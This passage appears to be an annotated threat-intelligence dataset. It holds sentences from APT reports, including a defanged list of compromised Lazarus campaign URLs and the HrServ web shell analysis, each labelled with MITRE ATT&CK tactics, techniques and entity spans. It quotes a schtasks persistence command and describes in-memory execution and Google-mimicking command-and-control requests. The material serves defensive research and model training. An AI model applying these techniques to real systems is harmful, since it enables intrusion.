althpro[.]or[.]kr/upload/naver_editor/subview/view[.]inc\nhxxps://www[.]medric[.]or[.]kr/Controls/Board/certificate[.]cer\nhxxps://www[.]muijae[.]com/daumeditor/pages/template/simple[.]asp\nhxxps://www[.]muijae[.]com/daumeditor/pages/template/template[.]asp\nhxxps://www[.]nonstopexpress[.]com/community/include/index[.]asp\nhxxps://www[.]seoulanesthesia[.]or[.]kr/mail/mail_211230[.]html\nhxxps://www[.]seouldementia[.]or[.]kr/_manage/inc/bbs/jiyeuk1_ok[.]asp\nhxxps://www[.]siriuskorea[.]co[.]kr/mall/community/bbs_read[.]asp\nhxxps://yoohannet[.]kr/min/tmp/process/proc[.]php\nMITRE ATT&CK Mapping Tactic Techniques Initial Access T1189 10/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p11-s97-dd8df3", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 11, "sentence_id": 97, "context_before": "hxxp://www[.]friendmc[.]com/upload/board/asp20062107[.]asp\nhxxp://www[.]hankooktop[.]com/ko/company/info[.]asp\nhxxp://www[.]khmcpharm[.]com/Lib/Modules/HtmlEditor/Util/read[.]cer\nhxxp://www[.]vietjetairkorea[.]com/INFO/info[.]asp\nhxxp://yoohannet[.]kr/min/tmp/process/proc[.]php\nhxxps://admin[.]esangedu[.]kr/XPaySample/submit[.]php\nhxxps://api[.]shw[.]kr/login_admin/member/login_fail[.]php\nhxxps://hicar[.]kalo[.]kr/data/rental/Coupon/include/inc[.]asp\nhxxps://hspje[.]com:80/menu6/teacher_qna[.]asp\nhxxps://kscmfs[.]or[.]kr/member/handle/log_proc[.]php\nhxxps://kstr[.]radiology[.]or[.]kr/upload/schedule/29431_1687715624[.]inc\nhxxps://little-pet[.]com/web/board/skin/default/read[.]php\nhxxps://mainbiz[.]or[.]kr/SmartEditor2/photo_uploader/popup/edit[.]asp\nhxxps://mainbiz[.]or[.]kr/include/common[.]asp\nhxxps://new-q-cells[.]com/upload/newsletter/cn/frame[.]php\nhxxps://pediatrics[.]or[.]kr/PubReader/build_css[.]php\nhxxps://pms[.]nninc[.]co[.]kr/app/content/board/inc_list[.]asp\nhxxps://safemotors[.]co[.]kr/daumeditor/pages/template/template[.]asp\nhxxps://swt-keystonevalve[.]com/data/editor/index[.]php\nhxxps://vnfmal2022[.]com/niabbs5/upload/gongji/index[.]php\nhxxps://warevalley[.]com/en/common/include/page_tab[.]asp\nhxxps://www[.]blastedlevels[.]com/levels4SqR8/measure[.]asp\nhxxps://www[.]droof[.]kr/Board/htmlEdit/PopupWin/Editor[.]asp\nhxxps://www[.]friendmc[.]com:80/upload/board/asp20062107[.]asp\nhxxps://www[.]hanlasangjo[.]com/editor/pages/page[.]asp\nhxxps://www[.]happinesscc[.]com/mobile/include/func[.]asp\nhxxps://www[.]healthpro[.]or[.]kr/upload/naver_editor/subview/view[.]inc\nhxxps://www[.]medric[.]or[.]kr/Controls/Board/certificate[.]cer\nhxxps://www[.]muijae[.]com/daumeditor/pages/template/simple[.]asp\nhxxps://www[.]muijae[.]com/daumeditor/pages/template/template[.]asp\nhxxps://www[.]nonstopexpress[.]com/community/include/index[.]asp\nhxxps://www[.]seoulanesthesia[.]or[.]kr/mail/mail_211230[.]html\nhxxps://www[.]seouldementia[.]or[.]kr/_manage/inc/bbs/jiyeuk1_ok[.]asp\nhxxps://www[.]siriuskorea[.]co[.]kr/mall/community/bbs_read[.]asp\nhxxps://yoohannet[.]kr/min/tmp/process/proc[.]php\nMITRE ATT&CK Mapping Tactic Techniques Initial Access T1189 10/11", "sentence_text": "Execution T1203\nPersistence T1547.012, T1574.002 Privilege Escalation T1547.012 Defense Evasion T1140, T1574.002, T1027.001, T1027.002, T1620 Credential Access T1003.001 Discovery T1057, T1082, T1083 Collection T1113 Command and Control T1071.001, T1132.002,", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p11-s98-e0df34", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 11, "sentence_id": 98, "context_before": "Execution T1203\nPersistence T1547.012, T1574.002 Privilege Escalation T1547.012 Defense Evasion T1140, T1574.002, T1027.001, T1027.002, T1620 Credential Access T1003.001 Discovery T1057, T1082, T1083 Collection T1113 Command and Control T1071.001, T1132.002,", "sentence_text": "T1573.001 Exfiltration T1041", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p11-s99-0996e7", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 11, "sentence_id": 99, "context_before": "T1573.001 Exfiltration T1041", "sentence_text": "Backdoor Lazarus Malware Descriptions Malware Technologies Targeted attacks Vulnerabilities and exploits A cascade of compromise: unveiling Lazarus’ new campaign Your email address will not be published.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p11-s100-88ad22", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 11, "sentence_id": 100, "context_before": "Backdoor Lazarus Malware Descriptions Malware Technologies Targeted attacks Vulnerabilities and exploits A cascade of compromise: unveiling Lazarus’ new campaign Your email address will not be published.", "sentence_text": "Required fields are marked * 11/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p1-s1-416112", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "HrServ – Previously unknown web shell used in APT attack securelist.com/hrserv-apt-web-shell/111119 Authors Mert Degirmenci Introduction", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p1-s2-87f211", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "HrServ – Previously unknown web shell used in APT attack securelist.com/hrserv-apt-web-shell/111119 Authors Mert Degirmenci Introduction", "sentence_text": "In the course of our routine investigation, we discovered a DLL file, identified as hrserv.dll, which is a previously unknown web shell exhibiting sophisticated features such as custom encoding methods for client communication and in-memory execution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p1-s3-4eb3e2", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "In the course of our routine investigation, we discovered a DLL file, identified as hrserv.dll, which is a previously unknown web shell exhibiting sophisticated features such as custom encoding methods for client communication and in-memory execution.", "sentence_text": "Our analysis of the sample led to the discovery of related variants compiled in 2021, indicating a potential correlation between these separate occurrences of malicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p1-s4-1f8c4f", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "Our analysis of the sample led to the discovery of related variants compiled in 2021, indicating a potential correlation between these separate occurrences of malicious activity.", "sentence_text": "Initial infection", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p1-s5-e0105c", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "Initial infection", "sentence_text": "According to our telemetry data, the PAExec.exe process initiates the creation of a scheduled task on the system named MicrosoftsUpdate (sic), which in turn is designed to execute a .BAT file.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" } ], "procedure": "Create scheduled task MicrosoftsUpdate to execute a BAT file.", "entities": [ { "text": "PAExec.exe process initiates the creation of a scheduled task on the system named MicrosoftsUpdate", "start": 37, "end": 135, "label": "Action" }, { "text": "PAExec.exe", "start": 37, "end": 47, "label": "MalwareTool" }, { "text": "MicrosoftsUpdate", "start": 119, "end": 135, "label": "Infrastructure_Indicator" }, { "text": ".BAT file", "start": 182, "end": 191, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-11_aptnotes_report-p1-s6-250eef", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "According to our telemetry data, the PAExec.exe process initiates the creation of a scheduled task on the system named MicrosoftsUpdate (sic), which in turn is designed to execute a .BAT file.", "sentence_text": "1 \"schtasks\" /create /sc", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p1-s8-b80e47", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "DAILY /tn", "sentence_text": "\"$system32\\cmd.exe /c 2 $public\\JKNLA.bat $public\\hrserv.dll\" /ru system /f", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p1-s9-80fee9", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "\"$system32\\cmd.exe /c 2 $public\\JKNLA.bat $public\\hrserv.dll\" /ru system /f", "sentence_text": "The .BAT file accepts the path of a DLL file as an argument.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p1-s10-d88d60", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 1, "sentence_id": 10, "context_before": "The .BAT file accepts the path of a DLL file as an argument.", "sentence_text": "In this instance, the script is provided with the file $public\\hrserv.dll, which is then copied to the System32 directory.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Copy hrserv.dll file to System32 directory.", "entities": [ { "text": "provided with the file $public\\hrserv.dll, which is then copied to the System32 directory", "start": 32, "end": 121, "label": "Action" }, { "text": "$public\\hrserv.dll", "start": 55, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "System32 directory", "start": 103, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "hrserv.dll", "start": 63, "end": 73, "label": "MalwareTool" } ] }, { "uid": "aptnotes-11_aptnotes_report-p1-s11-1295d6", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 1, "sentence_id": 11, "context_before": "In this instance, the script is provided with the file $public\\hrserv.dll, which is then copied to the System32 directory.", "sentence_text": "After this operation, the script configures a service via the system registry and the sc utility.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543", "name": "Create or Modify System Process" } ], "procedure": "Configure a service via system registry using sc utility.", "entities": [ { "text": "configures a service via the system registry and the sc utility", "start": 33, "end": 96, "label": "Action" }, { "text": "system registry", "start": 62, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "sc utility", "start": 86, "end": 96, "label": "MalwareTool" } ] }, { "uid": "aptnotes-11_aptnotes_report-p1-s12-9d6949", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 1, "sentence_id": 12, "context_before": "After this operation, the script configures a service via the system registry and the sc utility.", "sentence_text": "It then activates the newly created service.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543", "name": "Create or Modify System Process" } ], "procedure": "Activate newly created service for persistence.", "entities": [ { "text": "activates the newly created service", "start": 8, "end": 43, "label": "Action" }, { "text": "service", "start": 36, "end": 43, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-11_aptnotes_report-p1-s13-c4b548", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 1, "sentence_id": 13, "context_before": "It then activates the newly created service.", "sentence_text": "HrServ web shell MD5 418657bf50ee32acc633b95bac4943c6 SHA1 cb257e00a1082fc79debf9d1cb469bd250d8e026 SHA256 8043e6c6b5e9e316950ddb7060883de119e54f226ab7a320b743be99b9c10ec5 Link 2023-Aug-30 08:28:15 time 1/6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p2-s14-ba3efa", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "HrServ web shell MD5 418657bf50ee32acc633b95bac4943c6 SHA1 cb257e00a1082fc79debf9d1cb469bd250d8e026 SHA256 8043e6c6b5e9e316950ddb7060883de119e54f226ab7a320b743be99b9c10ec5 Link 2023-Aug-30 08:28:15 time 1/6", "sentence_text": "The sequence of operations starts with the registration of a service handler.", "relevant": "yes", "tactic": [ { "name": "Persistence", "id": "TA0003" } ], "techniques": [ { "name": "Create or Modify System Process", "id": "T1543" } ], "procedure": "A service handler is registered to establish persistence on the system.", "entities": [ { "text": "starts with the registration of a service handler", "start": 27, "end": 76, "label": "Action" } ] }, { "uid": "aptnotes-11_aptnotes_report-p2-s15-d6b45c", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "The sequence of operations starts with the registration of a service handler.", "sentence_text": "HrServ then initiates an HTTP server utilizing the HTTP server API for its functionality.", "relevant": "yes", "tactic": [ { "name": "Command and Control", "id": "TA0011" } ], "techniques": [ { "name": "Application Layer Protocol", "id": "T1071" } ], "procedure": "The malware initiates an HTTP server to enable command and control communication.", "entities": [ { "text": "initiates an HTTP server", "start": 12, "end": 36, "label": "Action" }, { "text": "HrServ", "start": 0, "end": 6, "label": "MalwareTool" } ] }, { "uid": "aptnotes-11_aptnotes_report-p2-s16-728489", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 2, "sentence_id": 16, "context_before": "HrServ then initiates an HTTP server utilizing the HTTP server API for its functionality.", "sentence_text": "It calls the routed to the request queue.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p2-s17-ad2a48", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 2, "sentence_id": 17, "context_before": "It calls the routed to the request queue.", "sentence_text": "1 http://+:80/FC4B97EB-2965-4A3B-8BAD-B8172DE25520/\nClient-server communication uses custom encoding techniques that include Base64 encoding and FNV1A64 hashing algorithms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p2-s18-4dcb03", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 2, "sentence_id": 18, "context_before": "1 http://+:80/FC4B97EB-2965-4A3B-8BAD-B8172DE25520/\nClient-server communication uses custom encoding techniques that include Base64 encoding and FNV1A64 hashing algorithms.", "sentence_text": "Based on the type and information within an HTTP request, specific functions are activated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p2-s19-9a7fff", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 2, "sentence_id": 19, "context_before": "Based on the type and information within an HTTP request, specific functions are activated.", "sentence_text": "These functions are distinguished by the GET parameter named cp.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p2-s20-e9221d", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 2, "sentence_id": 20, "context_before": "These functions are distinguished by the GET parameter named cp.", "sentence_text": "In addition, the DLL file utilizes the value of the NID cookie for various purposes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p2-s21-521722", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 2, "sentence_id": 21, "context_before": "In addition, the DLL file utilizes the value of the NID cookie for various purposes.", "sentence_text": "The use of the GET parameter pattern and the cookie value is consistent with practices employed by Google.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p2-s22-285fed", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 2, "sentence_id": 22, "context_before": "The use of the GET parameter pattern and the cookie value is consistent with practices employed by Google.", "sentence_text": "We suspect that this intentional similarity in naming conventions is intended to disguise these requests in network traffic, making it more challenging to detect such malicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p2-s23-fe5d36", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 2, "sentence_id": 23, "context_before": "We suspect that this intentional similarity in naming conventions is intended to disguise these requests in network traffic, making it more challenging to detect such malicious activity.", "sentence_text": "An example of such a request would be:\n1 &cp=1&client=desktop-gws-wiz-on-focus-serp&xssi=t&hl=en-TW&authuser=0&pq=\nRequest cp Description type value GET 0", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p2-s24-f1fdb5", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 2, "sentence_id": 24, "context_before": "An example of such a request would be:\n1 &cp=1&client=desktop-gws-wiz-on-focus-serp&xssi=t&hl=en-TW&authuser=0&pq=\nRequest cp Description type value GET 0", "sentence_text": "Call VirtualAlloc and copy a custom decoded NID cookie value, then create a new thread.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "Call VirtualAlloc, copy decoded NID cookie value, and create a new thread.", "entities": [ { "text": "Call VirtualAlloc and copy a custom decoded NID cookie value, then create a new thread", "start": 0, "end": 86, "label": "Action" }, { "text": "VirtualAlloc", "start": 5, "end": 17, "label": "MalwareTool" }, { "text": "NID cookie value", "start": 44, "end": 60, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-11_aptnotes_report-p2-s25-04b8f6", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 2, "sentence_id": 25, "context_before": "Call VirtualAlloc and copy a custom decoded NID cookie value, then create a new thread.", "sentence_text": "POST 1 Create a file using the custom decoded NID cookie value and write the custom decoded POST data to that file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "Create a file using decoded NID cookie value and write decoded POST data to the file.", "entities": [ { "text": "Create a file using the custom decoded NID cookie value and write the custom decoded POST data to that file", "start": 7, "end": 114, "label": "Action" }, { "text": "NID cookie value", "start": 46, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "POST data", "start": 92, "end": 101, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-11_aptnotes_report-p3-s27-5a8493", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 3, "sentence_id": 27, "context_before": "2/6", "sentence_text": "POST 6 Call VirtualAlloc and copy the custom decoded POST data, then create a new thread.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "Call VirtualAlloc, copy decoded POST data, and create a new thread.", "entities": [ { "text": "Call VirtualAlloc and copy the custom decoded POST data, then create a new thread", "start": 7, "end": 88, "label": "Action" }, { "text": "VirtualAlloc", "start": 12, "end": 24, "label": "MalwareTool" }, { "text": "POST data", "start": 53, "end": 62, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-11_aptnotes_report-p3-s28-218f58", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 3, "sentence_id": 28, "context_before": "POST 6 Call VirtualAlloc and copy the custom decoded POST data, then create a new thread.", "sentence_text": "GET 7 Return Outlook Web App HTML data", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p3-s30-69df20", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 3, "sentence_id": 30, "context_before": "[Duplicate].", "sentence_text": "Code execution", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p3-s31-3d2991", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 3, "sentence_id": 31, "context_before": "Code execution", "sentence_text": "If the cp value in the request is 6, this indicates a code execution process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p3-s32-6d04d2", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 3, "sentence_id": 32, "context_before": "If the cp value in the request is 6, this indicates a code execution process.", "sentence_text": "In a particular observed scenario, the cp value is unknown.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p3-s33-524b29", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 3, "sentence_id": 33, "context_before": "In a particular observed scenario, the cp value is unknown.", "sentence_text": "A multifunctional implant is activated in the system memory.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Activate multifunctional implant in system memory.", "entities": [ { "text": "A multifunctional implant is activated in the system memory", "start": 0, "end": 59, "label": "Action" }, { "text": "multifunctional implant", "start": 2, "end": 25, "label": "MalwareTool" } ] }, { "uid": "aptnotes-11_aptnotes_report-p3-s34-a5b366", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 3, "sentence_id": 34, "context_before": "A multifunctional implant is activated in the system memory.", "sentence_text": "As a result, the registry and the temporary file are used as a communication channel between the implant and HrServ.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Use registry and temporary files as a communication channel between implant and HrServ.", "entities": [ { "text": "registry and the temporary file are used as a communication channel between the implant and HrServ", "start": 17, "end": 115, "label": "Action" }, { "text": "registry", "start": 17, "end": 25, "label": "Infrastructure_Indicator" }, { "text": "temporary file", "start": 34, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "HrServ", "start": 109, "end": 115, "label": "MalwareTool" } ] }, { "uid": "aptnotes-11_aptnotes_report-p4-s36-b5e424", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 4, "sentence_id": 36, "context_before": "3/6", "sentence_text": "These DLL files date back to early 2021.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p4-s37-ddf8bb", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 4, "sentence_id": 37, "context_before": "These DLL files date back to early 2021.", "sentence_text": "They also use the custom encoding algorithm and behave the same way after a file read error.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p4-s38-b8e660", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 4, "sentence_id": 38, "context_before": "They also use the custom encoding algorithm and behave the same way after a file read error.", "sentence_text": "However, there are subtle differences.\n4/6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p5-s39-fa76cb", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 5, "sentence_id": 39, "context_before": "However, there are subtle differences.\n4/6", "sentence_text": "The web shell URL of these older variants differs from the current one:\n1 https://+:443/owa/MSExchangeService.svc", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p5-s40-b82354", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 5, "sentence_id": 40, "context_before": "The web shell URL of these older variants differs from the current one:\n1 https://+:443/owa/MSExchangeService.svc", "sentence_text": "These samples exhibit a distinct behavior by creating a process and retrieving its output through a pipe, as opposed to allocating a memory section and creating a thread from it.", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": [ { "name": "Command and Scripting Interpreter", "id": "T1059" } ], "procedure": "The malware creates a process and retrieves its output through a pipe.", "entities": [ { "text": "creating a process", "start": 45, "end": 63, "label": "Action" }, { "text": "retrieving its output through a pipe", "start": 68, "end": 104, "label": "Action" } ] }, { "uid": "aptnotes-11_aptnotes_report-p5-s41-12c43c", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 5, "sentence_id": 41, "context_before": "These samples exhibit a distinct behavior by creating a process and retrieving its output through a pipe, as opposed to allocating a memory section and creating a thread from it.", "sentence_text": "Victims\nThe only known victim according to our telemetry is a government entity in Afghanistan.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p5-s42-d7e95d", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 5, "sentence_id": 42, "context_before": "Victims\nThe only known victim according to our telemetry is a government entity in Afghanistan.", "sentence_text": "Attribution\nThe TTPs analyzed in this investigation are not associated with any known threat actors we are tracking, but there are a few things that we observed:\nthe GET parameters used in the hrserv.dll file, which is used to mimic Google services, include “hl”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p5-s43-8ec433", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 5, "sentence_id": 43, "context_before": "Attribution\nThe TTPs analyzed in this investigation are not associated with any known threat actors we are tracking, but there are a few things that we observed:\nthe GET parameters used in the hrserv.dll file, which is used to mimic Google services, include “hl”.", "sentence_text": "This specifies the host language of the user interface.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p5-s44-21fe6e", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 5, "sentence_id": 44, "context_before": "This specifies the host language of the user interface.", "sentence_text": "We saw multiple typos that suggest the actor behind the samples is not a native English speaker.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p5-s45-d8a0c4", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 5, "sentence_id": 45, "context_before": "We saw multiple typos that suggest the actor behind the samples is not a native English speaker.", "sentence_text": "An error message with a typo Conclusion The analyzed sample represents a capable web shell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p5-s46-64b1fb", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 5, "sentence_id": 46, "context_before": "An error message with a typo Conclusion The analyzed sample represents a capable web shell.", "sentence_text": "Based on the compile timestamps, its origins date back to at least 2021.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p5-s47-fc3dd3", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 5, "sentence_id": 47, "context_before": "Based on the compile timestamps, its origins date back to at least 2021.", "sentence_text": "This sophisticated malware variant exhibits the ability to initiate in-memory executions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p5-s48-e05776", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 5, "sentence_id": 48, "context_before": "This sophisticated malware variant exhibits the ability to initiate in-memory executions.", "sentence_text": "In the observed scenario, communication is established through registry manipulations and temporary files.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Establish communication via registry manipulation and temporary files.", "entities": [ { "text": "communication is established through registry manipulations and temporary files", "start": 26, "end": 105, "label": "Action" }, { "text": "registry manipulations", "start": 63, "end": 85, "label": "Infrastructure_Indicator" }, { "text": "temporary files", "start": 90, "end": 105, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-11_aptnotes_report-p6-s50-a6f541", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 6, "sentence_id": 50, "context_before": "5/6", "sentence_text": "Notably, the web shell and memory implant use different strings for specific conditions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p6-s51-8879ac", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 6, "sentence_id": 51, "context_before": "Notably, the web shell and memory implant use different strings for specific conditions.", "sentence_text": "In addition, the memory implant features a meticulously crafted help message.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p6-s52-6e0974", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 6, "sentence_id": 52, "context_before": "In addition, the memory implant features a meticulously crafted help message.", "sentence_text": "Considering these factors, the malware’s characteristics are more consistent with financially motivated malicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p6-s53-b9a4d6", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 6, "sentence_id": 53, "context_before": "Considering these factors, the malware’s characteristics are more consistent with financially motivated malicious activity.", "sentence_text": "However, its operational methodology exhibits similarities with APT behavior.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p6-s54-a6161d", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 6, "sentence_id": 54, "context_before": "However, its operational methodology exhibits similarities with APT behavior.", "sentence_text": "Despite the malware’s prolonged activity over several years, multiple instances involving these samples have not been documented.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p6-s55-c48f9e", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 6, "sentence_id": 55, "context_before": "Despite the malware’s prolonged activity over several years, multiple instances involving these samples have not been documented.", "sentence_text": "Our efforts are ongoing as we continue to monitor related activity, with the goal of unraveling the mystery in future investigations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p6-s56-e94b9a", "source": "aptnotes", 